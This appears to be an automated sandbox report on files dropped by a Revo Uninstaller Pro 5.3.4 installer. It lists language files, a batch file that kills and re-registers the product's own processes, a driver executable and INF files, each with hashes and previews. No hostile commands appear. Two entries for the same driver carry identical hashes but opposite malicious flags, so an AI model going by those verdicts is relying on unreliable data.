                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.S.r.p.s.k.i./.S.e.r.b.i.a.n. .....W.e.b.L.a.n.g.=.S.R.B.L.T.....T.r.a.n.s.l.a.t.o.r.=.D.r.a.g.a.n. .B.j.e.d.o.v. .d.r.a.g.a.n.b.j.e.d.o.v.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.3...1...1.............[.D.e.i.n.s.t.a.l.e.r. .L.i.n.i.j.a. .s.a. .a.l.a.t.k.a.m.a.].....1.0.2. .=. .I.z.g.l.e.d.....1.0.3. .=. .P.o.s.t.a.v.k.e.....1.0.4. .=. .D.e.i.n.s.t.a.l.e.r.....1.0.5. .=. .A.l.a.t.i.....1.0.6. .=. .P.r.e.s.r.e.t.a.n.j.e.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.k.o.n.e.....1.0.9. .=. .D.e.t.a.l.j.i.....1.1.0. .=. .D.e.i.n.s.t.a.l.i.r.a.j.....1.1.1. .=. .U.k.l.o.n.i. .u.n.o.s.....1.1.2. .=. .O.s.v.e.~.i.....1.1.3. .=. .U.k.l.o.n.i.t.i. .o.z.n.a...e.n.i. .u.n.o.s.?.....1.1.4. .=. .D.e.i.n.s.t.a.l.i.r.a.t.i. .o.z.n.a...e.n.i. .p.r.o.g.r.a.m.?.....1.1.5. .=. .D.o.g.r.a.d.n.j.a.....1.1.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):58204
                                                                                                                                            Entropy (8bit):5.700930679207834
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lo5zGJ0/0BCAJQbmrd16Qo6DzKCvytFvNOv+0syWNgZC3L51N5K0gI9+O/nuGNLM:KzmlQodpo6ktF1++0DWNgW6fuHE8M7
                                                                                                                                            MD5:6CB9F788594E515436E812AF86CE6971
                                                                                                                                            SHA1:3E2EFCD077D3E91C1B22C511EBB8F9DC8087C3DF
                                                                                                                                            SHA-256:C5AC1F6567EB3FDC2BB7809853F8F8D90D0DCEFCAC1E7EE881316AEFDE3D65EC
                                                                                                                                            SHA-512:70FD68DFB13EB4EFCA05E9963D64E779EFF6CF4B3DCFD9AFA54E4374D91B2F82C6A3AF023F28A53057EE0C944FEE847896723E0EBCE4854308EA0159008913CA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=..{SO-N.e ./. .S.i.m.p.l.i.f.i.e.d.C.h.i.n.e.s.e.....W.e.b.L.a.n.g.=.S.C.H.....T.r.a.n.s.l.a.t.o.r.=.Y.i. .L.a.n. .(.m.e.@.y.i.l.a.n.j.u...c.o.m.).,.f.a.i.r.y.c.n.@.1.3.9...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...2...6.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...V....1.0.3. .=. ...y.....1.0.4. .=. .xS}.hV....1.0.5. .=. ..]wQ....1.0.6. .=. ..s.N!j._....1.0.7. .=. ..Rh.....1.0.8. .=. ..V.h....1.0.9. .=. ..~......1.1.0. .=. .xS}.....1.1.1. .=. . Rd.ag.v....1.1.2. .=. .7R.e....1.1.3. .=. ..`nx.[.. Rd.@b..ag.v.T?.....1.1.4. .=. ..`nx.[.. Rd.@b...z.^.T?.....1.1.5. .=. ..R.f.e....1.1.6. .=. ..^.R....1.1.7. .=. .S_MR.]wQ.^.R..........1.1.8. .=. .;Nu...........1.1.9. .=. .sQ.N..........1.2.0. .=. ..`.N/f.|.~.{.tXT!.....1.2.1. .=. ..`nx.[.. Rd.@b...|.~.~.N.T?.\.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (510), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):117334
                                                                                                                                            Entropy (8bit):3.716232017222656
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:zoD4FEnB1D2yGMrJQK141CsyubT5GZGzC/v9OQ8+:zOV2LO
                                                                                                                                            MD5:9E9BB9C33D54BE4D2A74E4540F99585D
                                                                                                                                            SHA1:6F3733A4C377EBCDCC10E5811611AD26E6A8857F
                                                                                                                                            SHA-256:830BBF9501D2BC51E52AC755FA26090298C5E6895BC9091AED97F506E0C9D4E8
                                                                                                                                            SHA-512:75352F8809FD54C17026FE3220923398C18EE20B219F0C0E6970DA80F7483B63039FD4FF32632AD65C3B43B4EB3A345FF30AF59D9AA3AFB3AD97671B78DA0C4E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .S.l.o.v.e.n...i.n.a./.S.l.o.v.a.k.....W.e.b.L.a.n.g.=.S.K.....T.r.a.n.s.l.a.t.o.r.=.L.u.m.i.r. .-. .l.u.m.i.r.e.s.k.u.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...0...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .Z.o.b.r.a.z.e.n.i.e.....1.0.3. .=. .N.a.s.t.a.v.e.n.i.a.....1.0.4. .=. .O.d.i.n.a.t.a.l...t.o.r.....1.0.5. .=. .N...s.t.r.o.j.e.....1.0.6. .=. .R.e.~.i.m. .l.o.v.c.a.....1.0.7. .=. .Z.o.z.n.a.m.....1.0.8. .=. .I.k.o.n.y.....1.0.9. .=. .P.o.d.r.o.b.n.o.s.t.i.....1.1.0. .=. .O.d.i.n.a.t.a.l.o.v.a.e.....1.1.1. .=. .O.d.s.t.r...n.i.e.....1.1.2. .=. .O.b.n.o.v.i.e.....1.1.3. .=. .U.r...i.t.e. .c.h.c.e.t.e. .o.d.s.t.r...n.i.e. .v.y.b.r.a.t... .p.o.l.o.~.k.u.?.....1.1.4. .=. .U.r...i.t.e. .c.h.c.e.t.e. .o.d.i.n.a.t.a.l.o.v.a.e. .v.y.b.r.a.t...
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (679), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):133602
                                                                                                                                            Entropy (8bit):3.516276711475207
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:Vk8NAAdeen1o1CGzbaTe2awmWp1FWgyLR8c3O:mW
                                                                                                                                            MD5:C818A5793997CE34224359777E094BD5
                                                                                                                                            SHA1:3A64A87007A2793FEDEE099B283A3F0383BF2F74
                                                                                                                                            SHA-256:94123A86FA77F670133E4849FCFCD0564CBA01178075E778B67AB790C619E9AB
                                                                                                                                            SHA-512:BD7D40ABCA01A1CB1397F7332F77FE52579AAB8ED33585C7E7787C9991C768E2BF062D3367A9A36B3A2B5404CC6E63085933241FDBC4676751435194427DCF9C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.S.l.o.v.e.n.a...i.n.a./.S.l.o.v.e.n.i.a.n.....W.e.b.L.a.n.g.=.S.I.....T.r.a.n.s.l.a.t.o.r.=.V.i.n.k.o. .K.a.s.t.e.l.i.c.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .P.o.g.l.e.d.....1.0.3. .=. .N.a.s.t.a.v.i.t.v.e.....1.0.4. .=. .O.d.s.t.r.a.n.j.e.v.a.l.n.i.k.....1.0.5. .=. .O.r.o.d.j.a.....1.0.6. .=. .L.o.v.e.c. .....1.0.7. .=. .S.e.z.n.a.m.....1.0.8. .=. .I.k.o.n.e.....1.0.9. .=. .P.o.d.r.o.b.n.o.s.t.i.....1.1.0. .=. .O.d.s.t.r.a.n.i.....1.1.1. .=. .O.d.s.t.r.a.n.i. .v.n.o.s.....1.1.2. .=. .O.s.v.e.~.i.....1.1.3. .=. .S.t.e. .p.r.e.p.r.i...a.n.i.,. .d.a. .~.e.l.i.t.e. .o.d.s.t.r.a.n.i.t.i. .i.z.b.r.a.n.i. .v.n.o.s.?.....1.1.4. .=. .S.t.e. .p.r.e.p.r.i...a.n.i.,. .d.a. .~.e.l.i.t.e. .o.d.s.t.r.a.n.i.t.i. .i.z.b.r.a.n.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (619), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):135850
                                                                                                                                            Entropy (8bit):3.4417582346095577
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lo6exv60KMuKMJ3XUvR7kcuKO+1vWbNPD5Etnx7qVwF/Z4DeTO9fMLp/GAwljIeK:axS0RuKMqR7kcuy1vWbUd/GV+Lbfn
                                                                                                                                            MD5:AC710839BFC0EB302C8CB6A5194E1B6F
                                                                                                                                            SHA1:7721A6CC3C22585ACF111F53C426FC0AF6602000
                                                                                                                                            SHA-256:E88253ECC79EC3E528BD2ACCF23181830C06CA09F1912CAB6CE0E3C6A903AFBA
                                                                                                                                            SHA-512:9E91C669A51F9EE1594F245774DD674FBE78CA8115F9EE8B07038C5D0DF505DBB016746332D25DA8943A026967ADEE0233448C352E89C58207BB959C9C9C0A2D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.E.s.p.a...o.l./.S.p.a.n.i.s.h.....W.e.b.L.a.n.g.=.E.S.P.....T.r.a.n.s.l.a.t.o.r.=.J.o.s.e. .L.u.i.s. .V.i.l.l.a.l.b.a. .S.a.n.c.h.e.z.,. .F.e.r.n.a.n.d.o. .G.r.e.g.o.i.r.e.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.e.r.....1.0.3. .=. .O.p.c.i.o.n.e.s.....1.0.4. .=. .D.e.s.i.n.s.t.a.l.a.d.o.r.....1.0.5. .=. .H.e.r.r.a.m.i.e.n.t.a.s.....1.0.6. .=. .M.o.d.o. .S.i.l.e.n.c.i.o.s.o.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.c.o.n.o.s.....1.0.9. .=. .D.e.t.a.l.l.e.s.....1.1.0. .=. .D.e.s.i.n.s.t.a.l.a.r.....1.1.1. .=. .Q.u.i.t.a.r. .E.n.t.r.a.d.a.....1.1.2. .=. .R.e.f.r.e.s.c.a.r.....1.1.3. .=. ...E.s.t... .s.e.g.u.r.o. .d.e. .q.u.e. .d.e.s.e.a. .q.u.i.t.a.r. .l.a. .e.n.t.r.a.d.a. .s.e.l.e.c.c.i.o.n.a.d.a.?.....1.1.4. .
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (767), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):128354
                                                                                                                                            Entropy (8bit):3.480986127025453
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:7aptCikJrEmw4kK/D9YyhsiJNWFjNSj6VDJzwgCo:7aV
                                                                                                                                            MD5:BCDE611DC4AAD7E214456CAFAB8FD146
                                                                                                                                            SHA1:7E2865DDC57F0CC9EC4BC396808E79F90048D3C2
                                                                                                                                            SHA-256:014A98FE1ED05D74C4BB37BC23295D318A827CA9ED140EB0D4824AB13B932327
                                                                                                                                            SHA-512:EA2F7202A8F51E10E30F18465C5732E56AEEA81E3F90FBA53D865D8DB5D0551473A9A76E21A81931A506CACE484960A180A45E3197CDBAE59987F516E2B5EB81
                                                                                                                                            Malicious:false
Preview (decoded from UTF-16LE; truncated as in the report):
;Language file of Revo Uninstaller
;This section must use english
[Info]
Language= Svenska/Swedish
WebLang=SWE
Translator=1FF
Codepage=UNICODE
Version=5.3.4

[Uninstaller Toolbar]
102 = Visning
103 = Alternativ
104 = Avinstallerare
105 = Verktyg
106 = Jaktläge
107 = Lista
108 = Ikoner
109 = Detaljer
110 = Avinstallera
111 = Ta bort post
112 = Uppdatera
113 = Är det säkert att du vill ta bort den valda posten?
114 = Är det säkert att du vill avinstallera det valda progra
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (583), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):106396
                                                                                                                                            Entropy (8bit):4.270018902460138
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:xR071uEADs98s2u4xu/7NoNQdyYEzFVI/2o9xrfln+R47G/LbWdE0wbmw1hCtumE:8398sgaUBFGP61wE
                                                                                                                                            MD5:BA844724649201A288754E2F55838ED2
                                                                                                                                            SHA1:F332C9A6022F567CF6A6F69200E1CD18FB125663
                                                                                                                                            SHA-256:2D78A79A7EEE659D0BCB0F1DA0E4D9EE8209C6A6DA0A6965E93C409902495E4D
                                                                                                                                            SHA-512:5917CEC00A8C81AE33AA6371E78422D95005D4796BB10E079F198E2F0B254272518A87D1C07E2DC7D4BF308F8D74C354176A6F03DC6CD4DC71D7B6F932267B24
                                                                                                                                            Malicious:false
Preview (decoded from UTF-16LE; truncated as in the report):
;Language file of Revo Uninstaller Pro
;This section must use English
[Info]
Language= ภาษาไทย/Thai
WebLang = THAI
Translator = Pornchai Petthaveeporndej
Codepage = UNICODE
Version=4.4.2

[Uninstaller Toolbar]
102 to 114 = (Thai UI strings; not recoverable from the extracted preview)
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (304), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):59906
                                                                                                                                            Entropy (8bit):5.771309245234147
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:a1OmlKWIJw+wqYqn4wi7zv+vHj2gmoNus:o+wUY8W7zv+vHjlF
                                                                                                                                            MD5:FEE3AE3394835522278A93B0BC0D90DE
                                                                                                                                            SHA1:0E6E9CD7778E39B04CFC0360C8EEB3F96ADC7146
                                                                                                                                            SHA-256:8EC726AE49EA372C038E275B034C0CD4DD71F12E4DDC426701A89F889F9AE804
                                                                                                                                            SHA-512:F506246F3583B5D1E72F2FE5128D7CA17D8E2C5A75ABF522DCCA25622F84B672CE6C40EDFE945BDADF0C7B1B6C9BA1D9F8BB7985760E40AAB12BC23BC4BFAF3E
                                                                                                                                            Malicious:false
Preview (decoded from UTF-16LE; truncated as in the report):
;Language file of Revo Uninstaller Pro
;This section must use english
[Info]
Language= (Traditional Chinese language name; not recoverable from the extracted preview)/Traditional Chinese
WebLang= TCH
Translator= Tommy Chen, tonyyu27, KevinYu0504
Codepage= UNICODE
Version= 5.3.4

[Uninstaller Toolbar]
102 to 121 = (Traditional Chinese UI strings; not recoverable from the extracted preview)
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (656), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):129774
                                                                                                                                            Entropy (8bit):3.6427799288392415
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:WZh0Mg04blwiRK6nWBgUwSnYE77SlqvRUy+2JykmAwT/WBGSBvO3PhC7CSfq3vb9:N+xDOMjRdno
                                                                                                                                            MD5:150B402E0D5419C483B36AF4EC6D870C
                                                                                                                                            SHA1:E1706E77AE988807AA60DE2BD028846B77543DB5
                                                                                                                                            SHA-256:36C3A2CC9AAD2C03C81FB049765E5352A3BFE7CC65F462ECB4A24F9961A1CA3E
                                                                                                                                            SHA-512:D4DF88863D41CE9A92725915BAAD6CD9B725F808CD00B300DFBA69A6A22A2C3984519AE9F05D376EF30053A8DD2D74A19567C295203E1F529D621C3702AF8BA9
                                                                                                                                            Malicious:false
Preview (decoded from UTF-16LE; truncated as in the report):
;Language file of Revo Uninstaller Pro
;This section must use English
[Info]
Language=Türkçe/Turkish
WebLang=TR
Translator=Kaya Zeren translator@zeron.net
Codepage=UNICODE
Version=5.0.3

[Uninstaller Toolbar]
102 = Görünüm
103 = Ayarlar
104 = Kaldırıcı
105 = Araçlar
106 = Avcı kipi
107 = Liste
108 = Simgeler
109 = Ayrıntılar
110 = Kaldır
111 = Kaydı kaldır
112 = Yenile
113 = Seçilmiş kaydı kaldırmak istediğinize emin misiniz?
114 = Seçilmiş uygulamayı kaldırmak istedi
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (641), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):131462
                                                                                                                                            Entropy (8bit):4.006598591595778
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:bQUlrmrvEWUtL3EgNSp/7IAu821YhLxg2YS/:bQUlr0vG3TSp/7IAu82uhLd
                                                                                                                                            MD5:2B18F02BB760F19F344D567B0C671EA8
                                                                                                                                            SHA1:79BEC0F51098B51A90F63DA05CEBC8FBE560B556
                                                                                                                                            SHA-256:71C9B4A2712ACD913EEE9FDF4178E344CD6AF79915CA01AC9FFBD6A797B096EA
                                                                                                                                            SHA-512:55BEEDE938831AE93DBBE34C946AFE3C13EB0F670974DECA3275C2D431581C8D689703807E88CA28E483234CFD6C025B912EACCD8F645E3C9B409CC7CFA9950E
                                                                                                                                            Malicious:false
Preview (decoded from UTF-16LE; truncated as in the report):
;Language file of Revo Uninstaller Pro
;This section must use English
[Info]
Language= Українська/Ukrainian
WebLang=UKR
Translator=Alexey Lugin - alexeylugin@gmail.com
Codepage=UNICODE
Version=5.3.4

[Uninstaller Toolbar
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (551), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):121866
                                                                                                                                            Entropy (8bit):4.039495906761851
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lo4utFqYH2EX12i3SK0ZGjiuh1AjBVXstShQY6vbCXWpvXZnZtjAkussDj/5k0l1:Wii3SxojNuXs2KB82gEWNqu
                                                                                                                                            MD5:3496F90CD98263718552E231F2605E67
                                                                                                                                            SHA1:5BA4DCC61A461C6F3575377B38AEEA3913BB3BD9
                                                                                                                                            SHA-256:17DA614E8B8ACE89547B561BDE7B15EFEEEDA09B12A6D79DD1679B7A66D8D207
                                                                                                                                            SHA-512:214C2146FA1C577A4414E1BA8E45C75115CCDF06F7377A830E82C32B4D0F4933F4A237433536DCB78E1E93145C85BAFDB3D217A7EB7420960532C081B58F29CD
                                                                                                                                            Malicious:false
Preview (decoded from UTF-16LE; truncated as in the report):
;Language file of Revo Uninstaller Pro
;This section must use English
[Info]
Language=Tiếng Việt/Vietnamese
WebLang=VN
Translator= Đặng Trần Lệ Anh
Codepage=UNICODE
Version=5.3.4

[Uninstaller Toolbar]
102 = Hiển thị
103 = Tùy chọn
104 = Gỡ bỏ
105 = Công cụ
106 = Chế độ truy tìm
107 = Danh sách
108 = Biểu tượng
109 = Chi tiết
110 = Gỡ bỏ
111 = Xóa trong registry
112 = Làm mới
113 = Bạn có muốn gỡ registry đối tượng đã chọn?
114 = Bạn có muốn gỡ phần mềm đã chọn?
115
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):88
                                                                                                                                            Entropy (8bit):4.6625095008025434
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:nVN2kLnCvvEOVtqvepJQjkX3TAX:nvxrCvvEOPqvewwX8X
                                                                                                                                            MD5:85F8F277D3AB3F45C089C0B81116D85E
                                                                                                                                            SHA1:9D3106AE997DB2F449894446B296C5A14EC20E91
                                                                                                                                            SHA-256:6E6B62366A433BF575E72582FA7690C7B7901945B9C138F177FE657F00D77B3C
                                                                                                                                            SHA-512:C5A05526A1DF5A6E1B9F5E1DA9E602C78F87C4B189ECFB61BF8407BDD6B5316EE866435F1D70086A2601DFD40C90FA5B1DB12D1C1E51DE9BA2F7174306AC1276
                                                                                                                                            Malicious:false
Preview (CRLF line terminators shown as line breaks):
taskkill /IM RevoUninPro.exe /F
taskkill /IM ruplp.exe /F
"%~dp0\ruplp.exe" /regserver
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38400
                                                                                                                                            Entropy (8bit):6.303083119559888
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                            MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                            SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                            SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                            SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
Preview: PE header dump (MZ stub "This program cannot be run in DOS mode", PE32+ with sections .text, .rdata, .data, .pdata, PAGE, INIT, INIT, .rsrc, .reloc); raw bytes omitted.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Windows setup INFormation
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2444
                                                                                                                                            Entropy (8bit):4.986959697467434
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
                                                                                                                                            MD5:5187AC55870310AFF60ED802A729A31A
                                                                                                                                            SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
                                                                                                                                            SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
                                                                                                                                            SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
                                                                                                                                            Malicious:false
Preview (CRLF line terminators shown as line breaks; truncated as in the report; the sandbox's username substitution in the section name "DestinationDirs" has been undone):
;;;
;;; Revoflt
;;;
;;;
;;; Copyright (c) 2009, VS Revo Group Ltd.
;;;

[Version]
Signature = "$Windows NT$"
Class = "ActivityMonitor" ;This is determined by the work this filter driver does
ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class
Provider = %VSRG%
DriverVer = 12/30/2009,1.0.0.4
CatalogFile =

[DestinationDirs]
DefaultDestDir = 12
Revoflt.DriverFiles = 12 ;%windir%\system32\drivers

;;
;; Default install sections
;;

[DefaultInstall]
OptionDesc = %ServiceDescription%
CopyFiles = Revoflt.DriverFiles

[DefaultInstall.Services]
AddService = %ServiceName%,,Revoflt.Service

;;
;; Default uninstall sections
;;

[DefaultUninstall]
DelFiles = Revoflt.DriverFiles

[DefaultUninstall.Services]
DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting

;
; Services Section
;

[Revoflt.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Windows setup INFormation
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2444
                                                                                                                                            Entropy (8bit):4.986959697467434
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
                                                                                                                                            MD5:5187AC55870310AFF60ED802A729A31A
                                                                                                                                            SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
                                                                                                                                            SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
                                                                                                                                            SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
                                                                                                                                            Malicious:false
Preview (CRLF line terminators shown as line breaks; truncated as in the report; the sandbox's username substitution in the section name "DestinationDirs" has been undone):
;;;
;;; Revoflt
;;;
;;;
;;; Copyright (c) 2009, VS Revo Group Ltd.
;;;

[Version]
Signature = "$Windows NT$"
Class = "ActivityMonitor" ;This is determined by the work this filter driver does
ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class
Provider = %VSRG%
DriverVer = 12/30/2009,1.0.0.4
CatalogFile =

[DestinationDirs]
DefaultDestDir = 12
Revoflt.DriverFiles = 12 ;%windir%\system32\drivers

;;
;; Default install sections
;;

[DefaultInstall]
OptionDesc = %ServiceDescription%
CopyFiles = Revoflt.DriverFiles

[DefaultInstall.Services]
AddService = %ServiceName%,,Revoflt.Service

;;
;; Default uninstall sections
;;

[DefaultUninstall]
DelFiles = Revoflt.DriverFiles

[DefaultUninstall.Services]
DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting

;
; Services Section
;

[Revoflt.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38400
                                                                                                                                            Entropy (8bit):6.303083119559888
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                            MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                            SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                            SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                            SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3007016, page size 1024, file counter 53475, database pages 19288, 1st free page 14928, free pages 4, cookie 0x5f, schema 1, UTF-8, version-valid-for 53475
